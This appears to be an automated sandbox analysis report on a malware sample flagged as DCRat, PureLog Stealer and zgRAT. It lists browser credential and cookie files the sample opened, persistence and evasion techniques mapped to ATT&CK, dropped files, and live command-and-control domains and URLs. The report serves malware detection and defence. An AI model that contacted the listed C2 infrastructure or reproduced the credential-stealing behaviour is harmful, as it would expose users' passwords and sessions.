                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeQueries volume information: C:\Users\Public\Downloads\RuntimeBroker.exe VolumeInformation
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeQueries volume information: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformation
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeQueries volume information: C:\Users\Public\Downloads\RuntimeBroker.exe VolumeInformation
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: 00000000.00000002.1756102342.000000001303D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: W4tW72sfAD.exe PID: 6988, type: MEMORYSTR
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: W4tW72sfAD.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.W4tW72sfAD.exe.a10000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1644759918.0000000000A12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\Downloads\RuntimeBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
                          Yara detected zgRAT
                          Source: Yara matchFile source: W4tW72sfAD.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.W4tW72sfAD.exe.a10000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\Downloads\RuntimeBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                          Remote Access Functionality

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: 00000000.00000002.1756102342.000000001303D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: W4tW72sfAD.exe PID: 6988, type: MEMORYSTR
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: W4tW72sfAD.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.W4tW72sfAD.exe.a10000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.1644759918.0000000000A12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\Downloads\RuntimeBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
                          Yara detected zgRAT
                          Source: Yara matchFile source: W4tW72sfAD.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.W4tW72sfAD.exe.a10000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\Downloads\RuntimeBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information1
                          Scripting                          		Valid Accounts241
                          Windows Management Instrumentation                          		1
                          Scripting                          		1
                          DLL Side-Loading                          		11
                          Disable or Modify Tools                          		1
                          OS Credential Dumping                          		2
                          File and Directory Discovery                          		1
                          Taint Shared Content                          		11
                          Archive Collected Data                          		1
                          Web Service                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault AccountsScheduled Task/Job1
                          DLL Side-Loading                          		11
                          Process Injection                          		1
                          Deobfuscate/Decode Files or Information                          		LSASS Memory144
                          System Information Discovery                          		Remote Desktop Protocol1
                          Data from Local System                          		1
                          Ingress Tool Transfer                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAt21
                          Registry Run Keys / Startup Folder                          		21
                          Registry Run Keys / Startup Folder                          		2
                          Obfuscated Files or Information                          		Security Account Manager341
                          Security Software Discovery                          		SMB/Windows Admin Shares1
                          Clipboard Data                          		11
                          Encrypted Channel                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          Software Packing                          		NTDS1
                          Process Discovery                          		Distributed Component Object ModelInput Capture3
                          Non-Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          DLL Side-Loading                          		LSA Secrets271
                          Virtualization/Sandbox Evasion                          		SSHKeylogging14
                          Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          File Deletion                          		Cached Domain Credentials1
                          Application Window Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items243
                          Masquerading                          		DCSync1
                          Remote System Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job271
                          Virtualization/Sandbox Evasion                          		Proc Filesystem11
                          System Network Configuration Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                          Process Injection                          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428727 Sample: W4tW72sfAD.exe Startdate: 19/04/2024 Architecture: WINDOWS Score: 100 78 minecrafthyipixel.xyz 2->78 80 api.telegram.org 2->80 82 ipinfo.io 2->82 94 Snort IDS alert for network traffic 2->94 96 Antivirus detection for URL or domain 2->96 98 Antivirus detection for dropped file 2->98 104 15 other signatures 2->104 8 W4tW72sfAD.exe 21 37 2->8         started        13 juptXkyeRvGsIZrQGeVEsrnWhD.exe 2->13         started        15 juptXkyeRvGsIZrQGeVEsrnWhD.exe 3 2->15         started        17 9 other processes 2->17 signatures3 100 Performs DNS queries to domains with low reputation 78->100 102 Uses the Telegram API (likely for C&C communication) 80->102 process4 dnsIp5 88 api.telegram.org 149.154.167.220, 443, 49732 TELEGRAMRU United Kingdom 8->88 90 ipinfo.io 34.117.186.192, 443, 49730, 49731 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 8->90 62 C:\Users\user\Desktop\yzZxaXSF.log, PE32 8->62 dropped 64 C:\Users\user\Desktop\oQGhqvNX.log, PE32 8->64 dropped 66 C:\Users\user\Desktop\kdoiNyxj.log, PE32 8->66 dropped 74 14 other malicious files 8->74 dropped 114 Creates an undocumented autostart registry key 8->114 116 Creates multiple autostart registry keys 8->116 118 Drops PE files to the user root directory 8->118 130 3 other signatures 8->130 19 cmd.exe 8->19         started        22 csc.exe 4 8->22         started        25 powershell.exe 8->25         started        29 4 other processes 8->29 68 C:\Users\user\Desktop\wHsyCTFf.log, PE32 13->68 dropped 70 C:\Users\user\Desktop\ndjISZpy.log, PE32 13->70 dropped 72 C:\Users\user\Desktop\fAbTigaR.log, PE32 13->72 dropped 76 7 other malicious files 13->76 dropped 27 cmd.exe 13->27         started        120 Multi AV Scanner detection for dropped file 15->120 122 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 15->122 124 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 15->124 92 127.0.0.1 unknown unknown 17->92 126 Antivirus detection for dropped file 17->126 128 Machine Learning detection for dropped file 17->128 file6 signatures7 process8 file9 106 Uses ping.exe to sleep 19->106 108 Uses ping.exe to check the status of other devices and networks 19->108 31 juptXkyeRvGsIZrQGeVEsrnWhD.exe 19->31         started        46 3 other processes 19->46 52 C:\Windows\...\SecurityHealthSystray.exe, PE32 22->52 dropped 110 Infects executable files (exe, dll, sys, html) 22->110 34 conhost.exe 22->34         started        36 cvtres.exe 1 22->36         started        112 Loading BitLocker PowerShell Module 25->112 48 2 other processes 25->48 38 juptXkyeRvGsIZrQGeVEsrnWhD.exe 27->38         started        42 conhost.exe 27->42         started        44 conhost.exe 29->44         started        50 3 other processes 29->50 signatures10 process11 dnsIp12 132 Multi AV Scanner detection for dropped file 31->132 84 minecrafthyipixel.xyz 104.21.57.61, 49739, 49740, 49741 CLOUDFLARENETUS United States 38->84 86 172.67.189.92, 49878, 49896, 80 CLOUDFLARENETUS United States 38->86 54 C:\Users\user\Desktop\wexYWbhZ.log, PE32 38->54 dropped 56 C:\Users\user\Desktop\rrfZteSl.log, PE32 38->56 dropped 58 C:\Users\user\Desktop\quERYeDq.log, PE32 38->58 dropped 60 7 other malicious files 38->60 dropped 134 Tries to harvest and steal browser information (history, passwords, etc) 38->134 file13 signatures14

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          W4tW72sfAD.exe68%ReversingLabsByteCode-MSIL.Trojan.Mardom
                          W4tW72sfAD.exe100%AviraHEUR/AGEN.1323342
                          W4tW72sfAD.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe100%AviraHEUR/AGEN.1323342
                          C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat100%AviraBAT/Delbat.C
                          C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe100%AviraHEUR/AGEN.1323342
                          C:\Users\Public\Downloads\RuntimeBroker.exe100%AviraHEUR/AGEN.1323342
                          C:\Users\user\Desktop\GNRoGDmH.log100%AviraHEUR/AGEN.1300079
                          C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe100%AviraHEUR/AGEN.1323342
                          C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe100%AviraHEUR/AGEN.1323342
                          C:\Users\user\Desktop\EkAnmMVM.log100%AviraTR/PSW.Agent.qngqt
                          C:\Users\user\Desktop\BazpdGXT.log100%AviraTR/PSW.Agent.qngqt
                          C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe100%Joe Sandbox ML
                          C:\Users\user\Desktop\BuKwfPUT.log100%Joe Sandbox ML
                          C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe100%Joe Sandbox ML
                          C:\Users\Public\Downloads\RuntimeBroker.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe68%ReversingLabsByteCode-MSIL.Trojan.Mardom
                          C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe68%ReversingLabsByteCode-MSIL.Trojan.Mardom
                          C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe68%ReversingLabsByteCode-MSIL.Trojan.Mardom
                          C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe68%ReversingLabsByteCode-MSIL.Trojan.Mardom
                          C:\Users\Public\Downloads\RuntimeBroker.exe68%ReversingLabsByteCode-MSIL.Trojan.Mardom
                          C:\Users\user\Desktop\BazpdGXT.log67%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\BuKwfPUT.log8%ReversingLabs
                          C:\Users\user\Desktop\DEgxfiAU.log0%ReversingLabs
                          C:\Users\user\Desktop\EkAnmMVM.log67%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\GNRoGDmH.log5%ReversingLabs
                          C:\Users\user\Desktop\HScOGmcH.log3%ReversingLabs
                          C:\Users\user\Desktop\IhtNKAXm.log12%ReversingLabs
                          C:\Users\user\Desktop\JNNDResf.log4%ReversingLabs
                          C:\Users\user\Desktop\LionObPB.log12%ReversingLabs
                          C:\Users\user\Desktop\NEEtYbtY.log67%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\NWsvAoLz.log17%ReversingLabs
                          C:\Users\user\Desktop\QwkEqgro.log4%ReversingLabs
                          C:\Users\user\Desktop\UMwcyUfj.log5%ReversingLabs
                          C:\Users\user\Desktop\VRHDyDUj.log5%ReversingLabs
                          C:\Users\user\Desktop\WoNdSLwd.log8%ReversingLabs
                          C:\Users\user\Desktop\ZpKsdnCB.log5%ReversingLabs
                          C:\Users\user\Desktop\cnkBPSdA.log17%ReversingLabs
                          C:\Users\user\Desktop\eSWSCFMK.log0%ReversingLabs
                          C:\Users\user\Desktop\ekLJkSsv.log12%ReversingLabs
                          C:\Users\user\Desktop\fAbTigaR.log3%ReversingLabs
                          C:\Users\user\Desktop\hSShNgSi.log5%ReversingLabs
                          C:\Users\user\Desktop\kdoiNyxj.log3%ReversingLabs
                          C:\Users\user\Desktop\ndjISZpy.log4%ReversingLabs
                          C:\Users\user\Desktop\nweImycr.log12%ReversingLabs
                          C:\Users\user\Desktop\oQGhqvNX.log8%ReversingLabs
                          C:\Users\user\Desktop\quERYeDq.log17%ReversingLabs
                          C:\Users\user\Desktop\rrfZteSl.log12%ReversingLabs
                          C:\Users\user\Desktop\wHsyCTFf.log12%ReversingLabs
                          C:\Users\user\Desktop\wexYWbhZ.log5%ReversingLabs
                          C:\Users\user\Desktop\yzZxaXSF.log0%ReversingLabs

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
                          https://contoso.com/License0%URL Reputationsafe
                          http://crl.mic0%URL Reputationsafe
                          https://contoso.com/Icon0%URL Reputationsafe
                          https://contoso.com/0%URL Reputationsafe
                          http://crl.micros0%URL Reputationsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          ipinfo.io
                          		34.117.186.192
                          		truefalse
                            		high
                            api.telegram.org
                            		149.154.167.220
                            		truefalse
                              		high
                              minecrafthyipixel.xyz
                              		104.21.57.61
                              		truetrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://minecrafthyipixel.xyz/voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.phptrue
                                  		unknown
                                  https://ipinfo.io/countryfalse
                                    		high
                                    https://ipinfo.io/ipfalse
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabXrKvE5hfPM.49.drfalse
                                        		high
                                        http://nuget.org/NuGet.exepowershell.exe, 00000017.00000002.3013188018.000002B83F416000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2977777373.0000023E331A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2830656459.0000013AD3805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=XrKvE5hfPM.49.drfalse
                                            		high
                                            https://api.telegram.orgW4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003815000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoXrKvE5hfPM.49.drfalse
                                                		high
                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmptrue
                                                • URL Reputation: malware
                                                		unknown
                                                https://api.telegram.org/botW4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003815000.00000004.00000800.00020000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1766639664.000000001B862000.00000002.00000001.01000000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037DD000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037C6000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.000000000369B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000017.00000002.1826108573.000002B82F5C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1821605110.0000023E23358000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1821229291.0000014AD0EB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1786007812.0000013AC39B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://ipinfo.ioW4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003790000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://contoso.com/Licensepowershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://crl.micpowershell.exe, 0000001A.00000002.3124943366.0000014AE8DD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
